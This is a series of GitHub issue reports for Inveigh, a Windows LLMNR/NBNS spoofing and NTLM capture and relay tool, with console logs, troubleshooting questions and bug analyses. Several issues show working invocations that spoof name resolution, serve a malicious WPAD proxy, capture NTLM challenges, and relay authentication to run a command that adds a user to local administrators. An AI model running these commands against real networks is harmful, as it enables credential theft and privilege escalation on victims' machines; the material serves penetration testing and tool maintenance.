.\Inveigh.exe -HTTPPorts 10080 -mdns y -nbns y

[*] Press ESC to enter/exit interactive console
[+] [15:19:02] LLMNR(A) request [REDACTED] from 10.7.27.18 [response sent]
[+] [15:19:02] LLMNR(A) request [REDACTED] from 10.7.27.18 [response sent]
[-] [15:19:02] LLMNR(AAAA) request [REDACTED] from 10.7.27.18 [type ignored]
[-] [15:19:02] LLMNR(AAAA) request [REDACTED] from 10.7.27.18 [type ignored]
[.] [15:19:02] TCP(445) SYN packet from 10.7.27.18:65371
[.] [15:19:02] SMB1(445) negotiation request detected from 10.7.27.18:65371
[.] [15:19:02] SMB2+(445) negotiation request detected from 10.7.27.18:65371
[+] [15:19:02] SMB(445) NTLM challenge [ADC486A5AB9FF8CC] sent to 10.7.27.18:65371
[-] [15:19:02] Packet sniffing error detected - System.ArgumentException: Offset and length were out of bounds for the a
rray or count is greater than the number of elements from index to the end of the source collection.
   at System.Buffer.BlockCopy(Array src, Int32 srcOffset, Array dst, Int32 dstOffset, Int32 count)
   at Quiddity.Support.ASN1.GetTagBytes(Byte[] data, Int32& index, Int32 length, Byte tag, Byte& tagDecoded)
   at Quiddity.Support.ASN1.GetTagBytes(Int32 tag, Byte[] data)
   at Quiddity.NTLM.NTLMResponse.Decode(Byte[] data)
   at Quiddity.NTLM.NTLMResponse..ctor(Byte[] data)
   at Inveigh.Sniffer.ProcessSMB(Byte[] data, String clientIP, String listenerIP, String clientPort, String listenerPort
)
   at Inveigh.Sniffer.Start(String protocol, String snifferIP, Boolean isIPV6)
[-] [15:19:02] Packet sniffing error detected - System.IO.EndOfStreamException: Unable to read beyond the end of the str
eam.
   at System.IO.__Error.EndOfFile()
   at System.IO.BinaryReader.FillBuffer(Int32 numBytes)
   at System.IO.BinaryReader.ReadUInt16()
   at Quiddity.NTLM.NTLMHelper.ReadBytes(Byte[] data, Int32 offset)
   at Inveigh.Sniffer.ProcessSMB(Byte[] data, String clientIP, String listenerIP, String clientPort, String listenerPort
)
   at Inveigh.Sniffer.Start(String protocol, String snifferIP, Boolean isIPV6)
[.] [15:19:02] SMB1(445) negotiation request detected from 10.7.27.18:65372
[.] [15:19:02] SMB2+(445) negotiation request detected from 10.7.27.18:65372
[+] [15:19:02] SMB(445) NTLM challenge [B0D50469185CF3D0] sent to 10.70.151.129:65372
[-] [15:19:02] Packet sniffing error detected - System.ArgumentException: Offset and length were out of bounds for the a
rray or count is greater than the number of elements from index to the end of the source collection.
   at System.Buffer.BlockCopy(Array src, Int32 srcOffset, Array dst, Int32 dstOffset, Int32 count)
   at Quiddity.Support.ASN1.GetTagBytes(Byte[] data, Int32& index, Int32 length, Byte tag, Byte& tagDecoded)
   at Quiddity.Support.ASN1.GetTagBytes(Byte[] data, Int32& index, Int32 length, Byte tag, Byte& tagDecoded)
   at Quiddity.Support.ASN1.GetTagBytes(Int32 tag, Byte[] data)
   at Quiddity.NTLM.NTLMResponse.Decode(Byte[] data)
   at Quiddity.NTLM.NTLMResponse..ctor(Byte[] data)
   at Inveigh.Sniffer.ProcessSMB(Byte[] data, String clientIP, String listenerIP, String clientPort, String listenerPort
)
   at Inveigh.Sniffer.Start(String protocol, String snifferIP, Boolean isIPV6)
[+] [15:19:03] NBNS(00) request [80-01662PL] from 10.7.27.18 [response sent]
[+] [15:19:03] NBNS(00) request [80-01662PL] from 10.7.27.18 [response sent]
[-] [15:19:03] Packet sniffing error detected - System.IO.EndOfStreamException: Unable to read beyond the end of the str
eam.
   at System.IO.__Error.EndOfFile()
   at System.IO.BinaryReader.FillBuffer(Int32 numBytes)
   at System.IO.BinaryReader.ReadUInt16()
   at Quiddity.NTLM.NTLMHelper.ReadBytes(Byte[] data, Int32 offset)
   at Inveigh.Sniffer.ProcessSMB(Byte[] data, String clientIP, String listenerIP, String clientPort, String listenerPort
)
   at Inveigh.Sniffer.Start(String protocol, String snifferIP, Boolean isIPV6)
[+] [15:19:03] NBNS(00) request [80-01662PL] from 10.7.27.18 [response sent]
[+] [15:19:03] NBNS(00) request [80-01662PL] from 10.7.27.18 [response sent]
PS C:\Users\pentest>

If there is additional information you want let me know.

Invoke- commands do not exist

I have Git cloned the repo into a folder.
From here trying to run PS as admin and run the command Invoke-Inveigh as it says in the README screenshot results in an error that this command does not exist.
None of the commands in the README exist.

The only commands that are in this repo which can be run are Inviegh.ps1 and Inveigh-Realy.ps1.
If you run either of these, nothing happens.

NTLMv1/NLTMv2 Hashes Appear to be Incorrect

I used the latest version of Inveigh (cloned 2018-11-27) and found the following:

The second field of NTLMv1 hashes appear to only have 47 characters instead of 48.
The second field of NTLMv2 hashes appear to only have 31 characters now instead of 32.

I reverted to previous version of Inveigh that I have that is at least six months old and found that NTLMv1 hashes have 48 characters in the second field and NTLMv2 hashes have 32 characters in the second field (https://github.com/fullmetalcache/tools/blob/master/inveigh_stripped.ps1).

Mount remote share instead of executing command

Hello,

Is it possible to do NTLM relay (using InveighRelay) to mount a share on the target, rather than perform remote code execution ?
The idea behind this question is when the target is a Unix/Samba system, where NTLM authentication is effective but executing remote process through DCERPC calls (or whatever's under the hood) is not relevant.

Thanks,
Arno

Proxy auth but NTLM hash not captured

Hello Kevin,

First I would to thank you for such great tool.

I'm running Inveigh on the "attacker" machine (192.168.100.101) from an elevated shell using these parameters:

Invoke-Inveigh -IP 192.168.100.101 -ConsoleOutput Y -Proxy Y -WPADAuth Anonymous

In the victim machine (192.168.100.23) sniffing traffic with Wireshark I see the Inveigh host WPAD response:

function FindProxyForURL(url,host){ return "PROXY 192.168.100.101:8492; PROXY 192.168.100.101:8493; DIRECT";}

After that I'm seeing the target browser initiating a request through the proxy, receiving a 407 Unauthorized and executing the challenge response process:

CONNECT www.google.es:443 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727)
Proxy-Connection: Keep-Alive
Content-Length: 0
Proxy-Authorization: NTLM [REDACTED]
Pragma: no-cache
Host: www.google.es

HTTP/1.1 407 Unauthorized
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 09 Apr 2020 18:57:52 GMT
Content-Length: 0
Proxy-Authenticate: NTLM [REDACTED]]
Content-Type: text/html

CONNECT www.google.es:443 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727)
Proxy-Connection: Keep-Alive
Content-Length: 0
Host: www.google.es
Pragma: no-cache
Proxy-Authorization: NTLM [REDACTED]

The console output is confirming the wireshark output captured at the victim machine:

[+] [2020-04-09T18:57:51] LLMNR request for wpad received from 192.168.100.23 [response sent]
[+] [2020-04-09T18:57:51] TCP(80) SYN packet detected from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) GET request for /wpad.dat received from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) host header wpad received from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) user agent received from 192.168.100.23:59790:
Mozilla/4.0 (compatible; MSIE 7.0; Win32)
[+] [2020-04-09T18:57:51] TCP(8492) SYN packet detected from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) CONNECT request for www.google.es:443 received from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) host header www.google.es received from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) user agent received from 192.168.100.23:59791:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727)
[+] [2020-04-09T18:57:52] TCP(8492) SYN packet detected from 192.168.100.23:59792
[+] [2020-04-09T18:57:52] TCP(8493) SYN packet detected from 192.168.100.23:59793
[+] [2020-04-09T18:57:55] TCP(8493) SYN packet detected from 192.168.100.23:59793

Why Inveigh is not able of get the NetNTLM hash?

Thanks in advance!

Fails to capture challenge over SMB

I received a report of failed challenge capture over SMB. I found that there is at least one variation of an SMB2 NTLMSSP Challenge packet with that will prevent the challenge from being captured. I captured a packet from Windows 10 to Windows 10 showing 2 less bytes than expected between supportedMech and the NTLMSSP identifier in Wireshark. This causes the NTLMSSP type check to fail. Modifying the offset (line 829 of current version) can resolve the issue as a temp fix. Changing it to 27 worked for the Windows 10 scenario above. I will add in a better fix.

not sure what to do?

what do i do?

Documentation is incorrect for "-FileOutput Default=Disabled:"

Default is enabled not disabled.
https://github.com/Kevin-Robertson/Inveigh/blob/a07a71c0d4ae86d07f58cfbc1e97b48e228f11dc/Inveigh/Program.cs#L28C1-L28C50

Invoke-Inveighrelay doesn't execute command

Hi,

I've pretty much mimicked the setup in the Wiki and ran the commands from the example section from Invoke-InveighRelay.
Both commands execute fine, and when I try to authenticate to the attacking host where Inveigh runs I do see the authentication and the NTLM hash. However, the command's set (Net user add && net localgroup administrators /add) are never run.

Any idea as to what I am missing? Both the machine running Invoke_InveighRelay and the machine I am targetting are Windows 10 1709.

Best,
Kim

Inveigh won't capture hashes

Hello, I am using this syntax to run inveigh:
Invoke-inveigh -StatusOutput Y -Consoleoutput Y -ShowHelp N -HTTP Y -NBNS Y -LLMNR Y -DNS Y -Elevated Y -OutputStreamOnly Y -IP -IP 10.10.10.100

I am doing so through meterpreter's shell, so the consoleout part fails but the tool runs normally (i think). the output looks something like this:

[*] Inveigh 1.503 started at 2020-04-27T02:10:12
[+] Elevated Privilege Mode = Enabled
[+] Primary IP Address = 10.10.10.100
[+] Spoofer IP Address = 10.10.10.100
[+] ADIDNS Spoofer = Disabled
[+] DNS Spoofer = Enabled
[+] DNS TTL = 30 Seconds
[+] LLMNR Spoofer = Enabled
[+] LLMNR TTL = 30 Seconds
[+] mDNS Spoofer = Disabled
[+] NBNS Spoofer For Types 00,20 = Enabled
[+] NBNS TTL = 165 Seconds
[+] SMB Capture = Enabled
[+] HTTP Capture = Enabled
[+] HTTPS Capture = Disabled
[+] HTTP/HTTPS Authentication = NTLM
[+] WPAD Authentication = NTLM
[+] WPAD NTLM Authentication Ignore List = Firefox
[+] WPAD Response = Enabled
[+] Kerberos TGT Capture = Disabled
[+] Machine Account Capture = Disabled
[+] Console Output = Full
[+] File Output = Disabled
Cannot see if a key has been pressed when either application does not have a 
console or when console input has been redirected from a file. Try 
Console.In.Peek.
At line:6345 char:20

when I do get-inveigh, i don't see hashes, all I see is this:

[+] [2020-04-27T02:10:15] LLMNR request for testserver received from 10.10.10.133 [response sent]
[+] [2020-04-27T02:10:15] LLMNR request for testserver received from 10.10.10.133 [response sent]
[+] [2020-04-27T02:10:16] TCP(80) SYN packet detected from 10.10.10.133:56464
[+] [2020-04-27T02:10:29] LLMNR request for testserver received from 10.10.10.133 [response sent]
[+] [2020-04-27T02:10:30] LLMNR request for testserver received from 10.10.10.133 [response sent]

Am I using it the wrong way?
I also tried invoke-inveigh in parallel with invoke-inveighrelay, but the -command didnt execute, probably coz no hashes are being captured.

If anyone could help me with this it would be greatly appreciated!
Thank you.

arp poisoning

Is there a way to use this module for arp poisoning?
I was looking for this method working with powershell

cant set nbms types

PS C:\Windows\System32\spool\drivers\color> Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -NBNSTypes
 '00,20,03,1B,1C' -MachineAccounts Y
Invoke-Inveigh : Cannot validate argument on parameter 'NBNSTypes'. The argument "00,20,03,1B,1C" does not belong to
the set "00,03,20,1B,1C,1D,1E" specified by the ValidateSet attribute. Supply an argument that is in the set and then
try the command again.
At line:1 char:78
+ Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -NBNSTypes '00 ...
+                                                                              ~~~
    + CategoryInfo          : InvalidData: (:) [Invoke-Inveigh], ParameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationError,Invoke-Inveigh

NullReference Exception if IPv6 is disabled

Unhandled Exception: System.NullReferenceException: Object reference not set to an instance of an object. at Inveigh.Arguments.ParseArguments() at Inveigh.Program.Main(String[] arguments)

The error comes from line 295 in the Arguments.cs file because it is trying to insert into a null string:

Program.argMAC = Program.argMAC.Insert(2, ":").Insert(5, ":").Insert(8, ":").Insert(11, ":").Insert(14, ":");

The only solution was to enable IPv6 on my network adapter. Even if I use -IPv6 N I still get the error.

Unable to recognize

The external wireless network card cannot be recognized and the IP information cannot be obtained. What should I do